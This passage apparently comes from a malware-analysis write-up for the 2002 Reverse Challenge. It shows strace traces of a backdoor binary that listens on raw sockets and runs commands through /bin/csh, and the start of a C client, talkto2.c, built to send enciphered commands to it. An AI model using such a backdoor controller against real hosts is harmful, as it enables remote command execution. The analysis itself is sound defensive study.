rt_sigaction(SIGSEGV, {SIG_DFL}, NULL, 8) = 0

rt_sigaction(SIGUNUSED, {SIG_DFL}, NULL, 8) = 0

rt_sigaction(SIGPIPE, {SIG_DFL}, NULL, 8) = 0

rt_sigaction(SIGALRM, {SIG_DFL}, NULL, 8) = 0

rt_sigaction(SIGTERM, {SIG_IGN}, NULL, 8) = 0

rt_sigaction(SIGXCPU, {SIG_DFL}, NULL, 8) = 0

rt_sigaction(SIGXFSZ, {SIG_DFL}, NULL, 8) = 0

rt_sigaction(SIGVTALRM, {SIG_DFL}, NULL, 8) = 0

rt_sigaction(SIGPROF, {SIG_DFL}, NULL, 8) = 0

rt_sigaction(SIGUSR1, {SIG_DFL}, NULL, 8) = 0

rt_sigaction(SIGUSR2, {SIG_DFL}, NULL, 8) = 0

rt_sigaction(SIGINT, {SIG_DFL}, {0x804b8c0, [HUP INT ILL TRAP ABRT BUS FPE USR1 SEGV USR2 PIPE ALRM TERM XCPU XFSZ VTALRM PROF UNUSED], 0x4000000}, 8) = 0

rt_sigaction(SIGQUIT, {SIG_DFL}, {SIG_IGN}, 8) = 0

rt_sigaction(SIGCHLD, {SIG_IGN}, {0x805c190, [], 0x4000000}, 8) = 0

execve("/bin/csh", ["/bin/csh", "-f", "-c", "\352\352\352\352\352\352\352\340\352\352\352\352\352\352"...], [/* 25 vars */]) = 0

brk(0)                                  = 0x80994a0

old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40014000

open("/etc/ld.so.preload", O_RDONLY)    = -1 ENOENT (No such file or directory)

open("/etc/ld.so.cache", O_RDONLY)      = -1 ENOENT (No such file or directory)

open("/lib/i686/mmx/libtermcap.so.2", O_RDONLY) = -1 ENOENT (No such file or directory)

stat("/lib/i686/mmx", 0xbffff398)       = -1 ENOENT (No such file or directory)

open("/lib/i686/libtermcap.so.2", O_RDONLY) = -1 ENOENT (No such file or directory)

stat("/lib/i686", 0xbffff398)           = -1 ENOENT (No such file or directory)

open("/lib/mmx/libtermcap.so.2", O_RDONLY) = -1 ENOENT (No such file or directory)

stat("/lib/mmx", 0xbffff398)            = -1 ENOENT (No such file or directory)

open("/lib/libtermcap.so.2", O_RDONLY)  = 1

fstat(1, {st_mode=S_IFREG|0755, st_size=12224, ...}) = 0

read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0000\16\0"..., 4096) = 4096

old_mmap(NULL, 15304, PROT_READ|PROT_EXEC, MAP_PRIVATE, 1, 0) = 0x40015000

mprotect(0x40018000, 3016, PROT_NONE)   = 0

old_mmap(0x40018000, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 1, 0x2000) = 0x40018000

close(1)                                = 0

open("/lib/libc.so.6", O_RDONLY)        = 1

fstat(1, {st_mode=S_IFREG|0755, st_size=4101324, ...}) = 0

read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\210\212"..., 4096) = 4096

old_mmap(NULL, 1001564, PROT_READ|PROT_EXEC, MAP_PRIVATE, 1, 0) = 0x40019000

mprotect(0x40106000, 30812, PROT_NONE)  = 0

old_mmap(0x40106000, 16384, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 1, 0xec000) = 0x40106000

old_mmap(0x4010a000, 14428, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x4010a000

close(1)                                = 0

mprotect(0x40019000, 970752, PROT_READ|PROT_WRITE) = 0

mprotect(0x40019000, 970752, PROT_READ|PROT_EXEC) = 0

personality(PER_LINUX)                  = 0

getpid()                                = 1004

getuid()                                = 0

getgid()                                = 0

geteuid()                               = 0

getegid()                               = 0

brk(0)                                  = 0x80994a0

brk(0x80994c0)                          = 0x80994c0

brk(0x809a000)                          = 0x809a000

time(NULL)                              = 1021504250

rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_IGN}, 8) = 0

rt_sigaction(SIGCHLD, {SIG_IGN}, {SIG_DFL}, 8) = 0

rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

rt_sigaction(SIGQUIT, {SIG_DFL}, {SIG_DFL}, 8) = 0

rt_sigaction(SIGQUIT, {SIG_DFL}, {SIG_DFL}, 8) = 0

rt_sigaction(SIGHUP, {0x804b8c0, [HUP INT ILL TRAP ABRT BUS FPE USR1 SEGV USR2 PIPE ALRM TERM XCPU XFSZ VTALRM PROF UNUSED], 0x4000000}, {SIG_IGN}, 8) = 0

rt_sigaction(SIGHUP, {SIG_IGN}, {0x804b8c0, [HUP INT ILL TRAP ABRT BUS FPE USR1 SEGV USR2 PIPE ALRM TERM XCPU XFSZ VTALRM PROF UNUSED], 0x4000000}, 8) = 0

rt_sigaction(SIGINT, {0x804b8c0, [HUP INT ILL TRAP ABRT BUS FPE USR1 SEGV USR2 PIPE ALRM TERM XCPU XFSZ VTALRM PROF UNUSED], 0x4000000}, {SIG_DFL}, 8) = 0

rt_sigaction(SIGILL, {0x804b8c0, [HUP INT ILL TRAP ABRT BUS FPE USR1 SEGV USR2 PIPE ALRM TERM XCPU XFSZ VTALRM PROF UNUSED], 0x4000000}, {SIG_DFL}, 8) = 0

rt_sigaction(SIGTRAP, {0x804b8c0, [HUP INT ILL TRAP ABRT BUS FPE USR1 SEGV USR2 PIPE ALRM TERM XCPU XFSZ VTALRM PROF UNUSED], 0x4000000}, {SIG_DFL}, 8) = 0

rt_sigaction(SIGABRT, {0x804b8c0, [HUP INT ILL TRAP ABRT BUS FPE USR1 SEGV USR2 PIPE ALRM TERM XCPU XFSZ VTALRM PROF UNUSED], 0x4000000}, {SIG_DFL}, 8) = 0

rt_sigaction(SIGFPE, {0x804b8c0, [HUP INT ILL TRAP ABRT BUS FPE USR1 SEGV USR2 PIPE ALRM TERM XCPU XFSZ VTALRM PROF UNUSED], 0x4000000}, {SIG_DFL}, 8) = 0

rt_sigaction(SIGBUS, {0x804b8c0, [HUP INT ILL TRAP ABRT BUS FPE USR1 SEGV USR2 PIPE ALRM TERM XCPU XFSZ VTALRM PROF UNUSED], 0x4000000}, {SIG_DFL}, 8) = 0

rt_sigaction(SIGSEGV, {0x804b8c0, [HUP INT ILL TRAP ABRT BUS FPE USR1 SEGV USR2 PIPE ALRM TERM XCPU XFSZ VTALRM PROF UNUSED], 0x4000000}, {SIG_DFL}, 8) = 0

rt_sigaction(SIGUNUSED, {0x804b8c0, [HUP INT ILL TRAP ABRT BUS FPE USR1 SEGV USR2 PIPE ALRM TERM XCPU XFSZ VTALRM PROF UNUSED], 0x4000000}, {SIG_DFL}, 8) = 0

rt_sigaction(SIGPIPE, {0x804b8c0, [HUP INT ILL TRAP ABRT BUS FPE USR1 SEGV USR2 PIPE ALRM TERM XCPU XFSZ VTALRM PROF UNUSED], 0x4000000}, {SIG_DFL}, 8) = 0

rt_sigaction(SIGALRM, {0x804b8c0, [HUP INT ILL TRAP ABRT BUS FPE USR1 SEGV USR2 PIPE ALRM TERM XCPU XFSZ VTALRM PROF UNUSED], 0x4000000}, {SIG_DFL}, 8) = 0

rt_sigaction(SIGTERM, {0x804b8c0, [HUP INT ILL TRAP ABRT BUS FPE USR1 SEGV USR2 PIPE ALRM TERM XCPU XFSZ VTALRM PROF UNUSED], 0x4000000}, {SIG_IGN}, 8) = 0

rt_sigaction(SIGTERM, {SIG_IGN}, {0x804b8c0, [HUP INT ILL TRAP ABRT BUS FPE USR1 SEGV USR2 PIPE ALRM TERM XCPU XFSZ VTALRM PROF UNUSED], 0x4000000}, 8) = 0

rt_sigaction(SIGXCPU, {0x804b8c0, [HUP INT ILL TRAP ABRT BUS FPE USR1 SEGV USR2 PIPE ALRM TERM XCPU XFSZ VTALRM PROF UNUSED], 0x4000000}, {SIG_DFL}, 8) = 0

rt_sigaction(SIGXFSZ, {0x804b8c0, [HUP INT ILL TRAP ABRT BUS FPE USR1 SEGV USR2 PIPE ALRM TERM XCPU XFSZ VTALRM PROF UNUSED], 0x4000000}, {SIG_DFL}, 8) = 0

rt_sigaction(SIGVTALRM, {0x804b8c0, [HUP INT ILL TRAP ABRT BUS FPE USR1 SEGV USR2 PIPE ALRM TERM XCPU XFSZ VTALRM PROF UNUSED], 0x4000000}, {SIG_DFL}, 8) = 0

rt_sigaction(SIGPROF, {0x804b8c0, [HUP INT ILL TRAP ABRT BUS FPE USR1 SEGV USR2 PIPE ALRM TERM XCPU XFSZ VTALRM PROF UNUSED], 0x4000000}, {SIG_DFL}, 8) = 0

rt_sigaction(SIGUSR1, {0x804b8c0, [HUP INT ILL TRAP ABRT BUS FPE USR1 SEGV USR2 PIPE ALRM TERM XCPU XFSZ VTALRM PROF UNUSED], 0x4000000}, {SIG_DFL}, 8) = 0

rt_sigaction(SIGUSR2, {0x804b8c0, [HUP INT ILL TRAP ABRT BUS FPE USR1 SEGV USR2 PIPE ALRM TERM XCPU XFSZ VTALRM PROF UNUSED], 0x4000000}, {SIG_DFL}, 8) = 0

rt_sigprocmask(SIG_BLOCK, NULL, [], 8)  = 0

rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_DFL}, 8) = 0

socket(PF_UNIX, SOCK_STREAM, 0)         = 1

connect(1, {sin_family=AF_UNIX, path="                                                                                       /var/run/.nscd_socket"}, 110) = -1 ECONNREFUSED (Connection refused)

close(1)                                = 0

open("/etc/nsswitch.conf", O_RDONLY)    = -1 ENOENT (No such file or directory)

open("/lib/libnss_compat.so.2", O_RDONLY) = 1

fstat(1, {st_mode=S_IFREG|0755, st_size=219843, ...}) = 0

read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\31\0\000"..., 4096) = 4096

old_mmap(NULL, 45036, PROT_READ|PROT_EXEC, MAP_PRIVATE, 1, 0) = 0x4010e000

mprotect(0x40118000, 4076, PROT_NONE)   = 0

old_mmap(0x40118000, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 1, 0x9000) = 0x40118000

close(1)                                = 0

open("/lib/libnsl.so.1", O_RDONLY)      = 1

fstat(1, {st_mode=S_IFREG|0755, st_size=370141, ...}) = 0

read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20?\0\000"..., 4096) = 4096

old_mmap(NULL, 88104, PROT_READ|PROT_EXEC, MAP_PRIVATE, 1, 0) = 0x40119000

mprotect(0x4012b000, 14376, PROT_NONE)  = 0

old_mmap(0x4012b000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 1, 0x11000) = 0x4012b000

old_mmap(0x4012d000, 6184, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x4012d000

close(1)                                = 0

brk(0x809b000)                          = 0x809b000

open("/etc/nsswitch.conf", O_RDONLY)    = -1 ENOENT (No such file or directory)

uname({sys="Linux", node="hpspps3m.spain.hp.com", ...}) = 0

open("/etc/passwd", O_RDONLY)           = 1

fcntl(1, F_GETFD)                       = 0

fcntl(1, F_SETFD, FD_CLOEXEC)           = 0

fstat64(0x1, 0xbffff550)                = -1 ENOSYS (Function not implemented)

fstat(1, {st_mode=S_IFREG|0644, st_size=60, ...}) = 0

old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x4012f000

_llseek(1, 0, [0], SEEK_CUR)            = 0

read(1, "root:x:0:0:root:/:/bin/bash\ntest"..., 4096) = 60

close(1)                                = 0

munmap(0x4012f000, 4096)                = 0

uname({sys="Linux", node="hpspps3m.spain.hp.com", ...}) = 0

open("/lib/libnss_files.so.2", O_RDONLY) = 1

fstat(1, {st_mode=S_IFREG|0755, st_size=246652, ...}) = 0

read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p \0\000"..., 4096) = 4096

old_mmap(NULL, 36384, PROT_READ|PROT_EXEC, MAP_PRIVATE, 1, 0) = 0x4012f000

mprotect(0x40137000, 3616, PROT_NONE)   = 0

old_mmap(0x40137000, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 1, 0x7000) = 0x40137000

close(1)                                = 0

brk(0x809c000)                          = 0x809c000

brk(0x809e000)                          = 0x809e000

getcwd("/", 4095)                       = 2

getpid()                                = 1004

getppid()                               = 1003

stat(".", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0

stat("/usr/kerberos/bin/sh", 0xbffff6b0) = -1 ENOENT (No such file or directory)

stat("/usr/kerberos/bin/sh", 0xbffff6b0) = -1 ENOENT (No such file or directory)

stat("/sbin/sh", 0xbffff6b0)            = -1 ENOENT (No such file or directory)

stat("/usr/sbin/sh", 0xbffff6b0)        = -1 ENOENT (No such file or directory)

stat("/bin/sh", {st_mode=S_IFREG|0755, st_size=316848, ...}) = 0

getpgrp()                               = 1004

fcntl(-1, F_SETFD, FD_CLOEXEC)          = -1 EBADF (Bad file descriptor)

rt_sigaction(SIGCHLD, {0x805c190, [], 0x4000000}, {SIG_IGN}, 8) = 0

open("/bin/csh", O_RDONLY)              = 1

lseek(1, 0, SEEK_CUR)                   = 0

read(1, "#!/bin/sh\necho \"I was called wit"..., 80) = 73

lseek(1, 0, SEEK_SET)                   = 0

fcntl(1, F_SETFD, FD_CLOEXEC)           = 0

fcntl(1, F_GETFL)                       = 0 (flags O_RDONLY)

fstat(1, {st_mode=S_IFREG|0755, st_size=73, ...}) = 0

lseek(1, 0, SEEK_CUR)                   = 0

read(1, "#!/bin/sh\necho \"I was called wit"..., 73) = 73

brk(0x809f000)                          = 0x809f000

open("/tmp/csh.out", O_WRONLY|O_CREAT|O_TRUNC, 0666) = 2

fcntl(1, F_GETFD)                       = 0x1 (flags FD_CLOEXEC)

fcntl(1, F_DUPFD, 10)                   = 10

fcntl(1, F_GETFD)                       = 0x1 (flags FD_CLOEXEC)

fcntl(10, F_SETFD, FD_CLOEXEC)          = 0

lseek(1, -20, SEEK_CUR)                 = 53

fcntl(1, F_DUPFD, 10)                   = 11

fstat(11, {st_mode=S_IFREG|0755, st_size=73, ...}) = 0

lseek(11, 0, SEEK_CUR)                  = 53

close(1)                                = 0

dup2(2, 1)                              = 1

close(2)                                = 0

fstat(1, {st_mode=S_IFREG|0644, st_size=0, ...}) = 0

old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40138000

write(1, "I was called with -f -c \352\352\352\352\352\352\352\340"..., 202) = 202

dup2(10, 1)                             = 1

fcntl(10, F_GETFD)                      = 0x1 (flags FD_CLOEXEC)

close(10)                               = 0

read(11, "echo goodbye\nexit 0\n", 73)  = 20

write(1, "goodbye\n", 8)                = -1 EBADF (Bad file descriptor)

munmap(0x40138000, 4096)                = 0

_exit(0)                                = ?

 

 

 

 

 

bash# strace -f reverse/the-binary7

execve("reverse/the-binary7", ["reverse/the-binary7"], [/* 25 vars */]) = 0

personality(PER_LINUX)                  = 0

geteuid()                               = 0

sigaction(SIGCHLD, {SIG_IGN}, {SIG_DFL}, 0x40037c68) = 0

setsid()                                = 1009

sigaction(SIGCHLD, {SIG_IGN}, {SIG_IGN}, 0x80575a8) = 0

chdir("/")                              = 0

close(0)                                = 0

close(1)                                = 0

close(2)                                = 0

time(NULL)                              = 1021504306

socket(PF_INET, SOCK_RAW, 0xb /* IPPROTO_??? */) = 0

sigaction(SIGHUP, {SIG_IGN}, {SIG_DFL}, 0x40037c68) = 0

sigaction(SIGTERM, {SIG_IGN}, {SIG_DFL}, 0x40037c68) = 0

sigaction(SIGCHLD, {SIG_IGN}, {SIG_IGN}, 0x80575a8) = 0

sigaction(SIGCHLD, {SIG_IGN}, {SIG_IGN}, 0x80575a8) = 0

recv(0, "E\20\0\311\0\362\0\0000\v\213&\177\0\0\1\177\0\0\1\2AB"..., 2048, 0) = 201

oldselect(1, NULL, NULL, NULL, {0, 10000}) = 0 (Timeout)

recv(0, "E\0\2NS&\0\0\372\v\354}\177\0\0\1\0\0\0\0\3\0\27/Md{\204"..., 2048, 0) = 590

oldselect(1, NULL, NULL, NULL, {0, 10000}) = 0 (Timeout)

recv(0, "E\20\0\311\0\362\0\0000\v\213&\177\0\0\1\177\0\0\1\2AB"..., 2048, 0) = 201

oldselect(1, NULL, NULL, NULL, {0, 10000}) = 0 (Timeout)

recv(0, "E\0\1\345\271\322\0\0\372\v\206:\177\0\0\1\0\0\0\0\3\0"..., 2048, 0) = 485

oldselect(1, NULL, NULL, NULL, {0, 10000}) = 0 (Timeout)

recv(0,  <unfinished ...>

 

 

 

 

 

 

bash# strace -f reverse/the-binary8

execve("reverse/the-binary8", ["reverse/the-binary8"], [/* 25 vars */]) = 0

personality(PER_LINUX)                  = 0

geteuid()                               = 0

sigaction(SIGCHLD, {SIG_IGN}, {SIG_DFL}, 0x40037c68) = 0

setsid()                                = 1017

sigaction(SIGCHLD, {SIG_IGN}, {SIG_IGN}, 0x80575a8) = 0

chdir("/")                              = 0

close(0)                                = 0

close(1)                                = 0

close(2)                                = 0

time(NULL)                              = 1021504342

socket(PF_INET, SOCK_RAW, 0xb /* IPPROTO_??? */) = 0

sigaction(SIGHUP, {SIG_IGN}, {SIG_DFL}, 0x40037c68) = 0

sigaction(SIGTERM, {SIG_IGN}, {SIG_DFL}, 0x40037c68) = 0

sigaction(SIGCHLD, {SIG_IGN}, {SIG_IGN}, 0x80575a8) = 0

sigaction(SIGCHLD, {SIG_IGN}, {SIG_IGN}, 0x80575a8) = 0

recv(0, "E\20\0\311\0\362\0\0000\v\213&\177\0\0\1\177\0\0\1\2AB"..., 2048, 0) = 201

socket(PF_INET, SOCK_RAW, IPPROTO_RAW)  = 1

brk(0)                                  = 0x807eb98

brk(0x807ebb8)                          = 0x807ebb8

brk(0x807f000)                          = 0x807f000

open("/usr/share/locale/en_US/LC_MESSAGES", O_RDONLY) = -1 ENOENT (No such file or directory)

stat("/etc/locale/C/libc.cat", 0xbfffa2c8) = -1 ENOENT (No such file or directory)

stat("/usr/lib/locale/C/libc.cat", 0xbfffa2c8) = -1 ENOENT (No such file or directory)

stat("/usr/lib/locale/libc/C", 0xbfffa2c8) = -1 ENOENT (No such file or directory)

stat("/usr/share/locale/C/libc.cat", 0xbfffa2c8) = -1 ENOENT (No such file or directory)

stat("/usr/local/share/locale/C/libc.cat", 0xbfffa2c8) = -1 ENOENT (No such file or directory)

open("/etc/host.conf", O_RDONLY)        = -1 ENOENT (No such file or directory)

gettimeofday({1021504345, 349346}, NULL) = 0

getpid()                                = 1017

open("/etc/resolv.conf", O_RDONLY)      = -1 ENOENT (No such file or directory)

uname({sys="Linux", node="hpspps3m.spain.hp.com", ...}) = 0

sigprocmask(SIG_BLOCK, [ALRM], [])      = 0

sigaction(SIGALRM, {0x80556c4, [], 0}, {SIG_DFL}, 0x40037c68) = 0

time(NULL)                              = 1021504345

alarm(600)                              = 0

sigsuspend([] <unfinished ...>

 

 

 

 

 

 

bash# strace -f reverse/the-binary9

execve("reverse/the-binary9", ["reverse/the-binary9"], [/* 25 vars */]) = 0

personality(PER_LINUX)                  = 0

geteuid()                               = 0

sigaction(SIGCHLD, {SIG_IGN}, {SIG_DFL}, 0x40037c68) = 0

setsid()                                = 1022

sigaction(SIGCHLD, {SIG_IGN}, {SIG_IGN}, 0x80575a8) = 0

chdir("/")                              = 0

close(0)                                = 0

close(1)                                = 0

close(2)                                = 0

time(NULL)                              = 1021504358

socket(PF_INET, SOCK_RAW, 0xb /* IPPROTO_??? */) = 0

sigaction(SIGHUP, {SIG_IGN}, {SIG_DFL}, 0x40037c68) = 0

sigaction(SIGTERM, {SIG_IGN}, {SIG_DFL}, 0x40037c68) = 0

sigaction(SIGCHLD, {SIG_IGN}, {SIG_IGN}, 0x80575a8) = 0

sigaction(SIGCHLD, {SIG_IGN}, {SIG_IGN}, 0x80575a8) = 0

recv(0, "E\20\0\311\0\362\0\0000\v\213&\177\0\0\1\177\0\0\1\2AB"..., 2048, 0) = 201

time(NULL)                              = 1021504368

socket(PF_INET, SOCK_RAW, IPPROTO_RAW)  = 1

brk(0)                                  = 0x807eb98

brk(0x807ebb8)                          = 0x807ebb8

brk(0x807f000)                          = 0x807f000

open("/usr/share/locale/en_US/LC_MESSAGES", O_RDONLY) = -1 ENOENT (No such file or directory)

stat("/etc/locale/C/libc.cat", 0xbfffa85c) = -1 ENOENT (No such file or directory)

stat("/usr/lib/locale/C/libc.cat", 0xbfffa85c) = -1 ENOENT (No such file or directory)

stat("/usr/lib/locale/libc/C", 0xbfffa85c) = -1 ENOENT (No such file or directory)

stat("/usr/share/locale/C/libc.cat", 0xbfffa85c) = -1 ENOENT (No such file or directory)

stat("/usr/local/share/locale/C/libc.cat", 0xbfffa85c) = -1 ENOENT (No such file or directory)

open("/etc/host.conf", O_RDONLY)        = -1 ENOENT (No such file or directory)

gettimeofday({1021504368, 223327}, NULL) = 0

getpid()                                = 1022

open("/etc/resolv.conf", O_RDONLY)      = -1 ENOENT (No such file or directory)

uname({sys="Linux", node="hpspps3m.spain.hp.com", ...}) = 0

sigprocmask(SIG_BLOCK, [ALRM], [])      = 0

sigaction(SIGALRM, {0x80556c4, [], 0}, {SIG_DFL}, 0x40037c68) = 0

time(NULL)                              = 1021504368

alarm(600)                              = 0

sigsuspend([] <unfinished ...>

 

 

 

 

 

 

bash# strace -f reverse/the-binaryA

execve("reverse/the-binaryA", ["reverse/the-binaryA"], [/* 25 vars */]) = 0

personality(PER_LINUX)                  = 0

geteuid()                               = 0

sigaction(SIGCHLD, {SIG_IGN}, {SIG_DFL}, 0x40037c68) = 0

setsid()                                = 1027

sigaction(SIGCHLD, {SIG_IGN}, {SIG_IGN}, 0x80575a8) = 0

chdir("/")                              = 0

close(0)                                = 0

close(1)                                = 0

close(2)                                = 0

time(NULL)                              = 1021504378

socket(PF_INET, SOCK_RAW, 0xb /* IPPROTO_??? */) = 0

sigaction(SIGHUP, {SIG_IGN}, {SIG_DFL}, 0x40037c68) = 0

sigaction(SIGTERM, {SIG_IGN}, {SIG_DFL}, 0x40037c68) = 0

sigaction(SIGCHLD, {SIG_IGN}, {SIG_IGN}, 0x80575a8) = 0

sigaction(SIGCHLD, {SIG_IGN}, {SIG_IGN}, 0x80575a8) = 0

recv(0, "E\20\0\311\0\362\0\0000\v\213&\177\0\0\1\177\0\0\1\2AB"..., 2048, 0) = 201

time(NULL)                              = 1021504385

socket(PF_INET, SOCK_RAW, IPPROTO_RAW)  = 1

brk(0)                                  = 0x807eb98

brk(0x807ebb8)                          = 0x807ebb8

brk(0x807f000)                          = 0x807f000

open("/usr/share/locale/en_US/LC_MESSAGES", O_RDONLY) = -1 ENOENT (No such file or directory)

stat("/etc/locale/C/libc.cat", 0xbfffa85c) = -1 ENOENT (No such file or directory)

stat("/usr/lib/locale/C/libc.cat", 0xbfffa85c) = -1 ENOENT (No such file or directory)

stat("/usr/lib/locale/libc/C", 0xbfffa85c) = -1 ENOENT (No such file or directory)

stat("/usr/share/locale/C/libc.cat", 0xbfffa85c) = -1 ENOENT (No such file or directory)

stat("/usr/local/share/locale/C/libc.cat", 0xbfffa85c) = -1 ENOENT (No such file or directory)

open("/etc/host.conf", O_RDONLY)        = -1 ENOENT (No such file or directory)

gettimeofday({1021504385, 90730}, NULL) = 0

getpid()                                = 1027

open("/etc/resolv.conf", O_RDONLY)      = -1 ENOENT (No such file or directory)

uname({sys="Linux", node="hpspps3m.spain.hp.com", ...}) = 0

sigprocmask(SIG_BLOCK, [ALRM], [])      = 0

sigaction(SIGALRM, {0x80556c4, [], 0}, {SIG_DFL}, 0x40037c68) = 0

time(NULL)                              = 1021504385

alarm(600)                              = 0

sigsuspend([] <unfinished ...>

 

 

 

 

 

 

bash# strace -f reverse/the-binaryB

execve("reverse/the-binaryB", ["reverse/the-binaryB"], [/* 25 vars */]) = 0

personality(PER_LINUX)                  = 0

geteuid()                               = 0

sigaction(SIGCHLD, {SIG_IGN}, {SIG_DFL}, 0x40037c68) = 0

setsid()                                = 1032

sigaction(SIGCHLD, {SIG_IGN}, {SIG_IGN}, 0x80575a8) = 0

chdir("/")                              = 0

close(0)                                = 0

close(1)                                = 0

close(2)                                = 0

time(NULL)                              = 1021504394

socket(PF_INET, SOCK_RAW, 0xb /* IPPROTO_??? */) = 0

sigaction(SIGHUP, {SIG_IGN}, {SIG_DFL}, 0x40037c68) = 0

sigaction(SIGTERM, {SIG_IGN}, {SIG_DFL}, 0x40037c68) = 0

sigaction(SIGCHLD, {SIG_IGN}, {SIG_IGN}, 0x80575a8) = 0

sigaction(SIGCHLD, {SIG_IGN}, {SIG_IGN}, 0x80575a8) = 0

recv(0, "E\20\0\311\0\362\0\0000\v\213&\177\0\0\1\177\0\0\1\2AB"..., 2048, 0) = 201

socket(PF_INET, SOCK_RAW, IPPROTO_RAW)  = 1

brk(0)                                  = 0x807eb98

brk(0x807ebb8)                          = 0x807ebb8

brk(0x807f000)                          = 0x807f000

open("/usr/share/locale/en_US/LC_MESSAGES", O_RDONLY) = -1 ENOENT (No such file or directory)

stat("/etc/locale/C/libc.cat", 0xbfffa2a0) = -1 ENOENT (No such file or directory)

stat("/usr/lib/locale/C/libc.cat", 0xbfffa2a0) = -1 ENOENT (No such file or directory)

stat("/usr/lib/locale/libc/C", 0xbfffa2a0) = -1 ENOENT (No such file or directory)

stat("/usr/share/locale/C/libc.cat", 0xbfffa2a0) = -1 ENOENT (No such file or directory)

stat("/usr/local/share/locale/C/libc.cat", 0xbfffa2a0) = -1 ENOENT (No such file or directory)

open("/etc/host.conf", O_RDONLY)        = -1 ENOENT (No such file or directory)

gettimeofday({1021504397, 29251}, NULL) = 0

getpid()                                = 1032

open("/etc/resolv.conf", O_RDONLY)      = -1 ENOENT (No such file or directory)

uname({sys="Linux", node="hpspps3m.spain.hp.com", ...}) = 0

sigprocmask(SIG_BLOCK, [ALRM], [])      = 0

sigaction(SIGALRM, {0x80556c4, [], 0}, {SIG_DFL}, 0x40037c68) = 0

time(NULL)                              = 1021504397

alarm(600)                              = 0

sigsuspend([] <unfinished ...>



 


Appendix 6: talkto2.c program listing

 

talkto2.c: Cipher/Decipher version.

 

The main change introduced in this version from the previous one was the capability of ciphering the data to be sent, read from the standard input as said in the first version, using the same algorithm used by “the-binary”. This binary also takes into account the special management that takes places in “the-binary” with the second character, first one after the initial 0x2 character in the payload.

 

A new source code file was added to work with the third version of the network client. It was called “r_ciphering.c”. This file provides the two functions that perform the ciphering/deciphering of messages the way "the_binary" of the Reverse Challenge likes it, called “r_cipher” and “r_decipher”.

 

/***************************************************************************\

* File:

*   talkto2.c

*

* Description:

*   Tool to talk to "the-binary" of The Reverse Challenge.

*

* Revisions:

*   2002-05-08. First version.

*       - Version number 1.0.0

*   2002-05-14. Payload adapted to talk “to the-binary”.

*  First version derived from "talk.c":

*  - Force first byte of the payload to be "0x02".

*  - Option for selecting number of bytes inside the packet. Default is 1500 bytes.

*   It should be at least 201 bytes: the minimum expected by "the-binary":

*    201 bytes = 20 IP header + 181 payload.

*   2002-05-19.

*     - Changed version number to 1.1.0

*  - Added encryption as expected by "the_binary"

*

\***************************************************************************/

 

#include <stdio.h>

#include <stdlib.h>

#include <unistd.h>

#include <ctype.h>

#include <sys/types.h>

#include <sys/socket.h>

#include <netinet/in.h>

#include <arpa/inet.h>

#include <netdb.h>

 

/* exit values */

#define EXIT_NO_ROOT 1

#define EXIT_NO_SOCK 1

 

/* default values */

#define SERVER_PROT 0xb

#define BUFF_SIZE 1480 /* Ethernet MTU: 1500 - IP header: 20 */

 

void help (char *, char *);

int talk(char *, int);

 

/*

Function:

  main

Description:

  Parses the command line.

*/

int

main (int argc, char * argv[])

{

  char * version = "1.1.0";

  char * server_name = "localhost";

  int server_prot = SERVER_PROT;

  int buff_size = BUFF_SIZE;

  char buffer[BUFF_SIZE];

  char * pbuffer   = buffer+1;

  char * cleartext = buffer+2;

  char ciphertext[BUFF_SIZE];

  int sock;

  int c;

  int i = 0;

  int size = buff_size;

  /* By default it sends 1500 bytes packets = Ethernet MTU */

 

  opterr = 0;

 

  /* Initializing buffer */

  bzero(buffer,BUFF_SIZE);

 

  while ((c = getopt (argc, argv, "hp:s:b:")) != -1)

    switch (c)

      {

      case 'h':

   help(argv[0], version);

   exit(0);

   break;

      case 'p':

   server_prot = atoi(optarg);

   break;

      case 's':

   server_name = (char *)malloc(strlen(optarg));

   strcpy(server_name, optarg);

   break;

      case 'b':

   size = atoi(optarg);

   if (size > buff_size) {

     fprintf (stderr, "Option `-%c': size (bytes) must be less than %d.\n", optopt,

                buff_size);

     exit(-1);

   }

   break;

      case '?':

   if (isprint (optopt))

     fprintf (stderr, "Option `-%c' IGNORED.\n", optopt);

   else

     fprintf (stderr,

            "Option character `\\x%x' IGNORED.\n",

            optopt);

      }

 

  if (geteuid() != 0)

    {

      fprintf(stderr, "Only root can use this program!.Sorry.\n");

      help(argv[0], version);

      exit(EXIT_NO_ROOT);

    }

  if ((sock = talk(server_name, server_prot)) < 0)

    {

      fprintf(stderr, "Error while creating the socket.\n");

      exit(EXIT_NO_SOCK);

    }

  /* according to the IRIX TCP/IP programming guide,

     connectionless sockets  should be used with sendto instead of

     write */

 

  pbuffer   = buffer+1;

  buff_size = BUFF_SIZE-1;

 

  /* We get the user input and copy it to the buffer from the second byte to the end */

  while( (i=getline(&pbuffer, &buff_size, stdin)) != -1)

    {

 

     /* Set first packet byte to 0x02 as "the-binary" expects */

     *buffer=0x02;

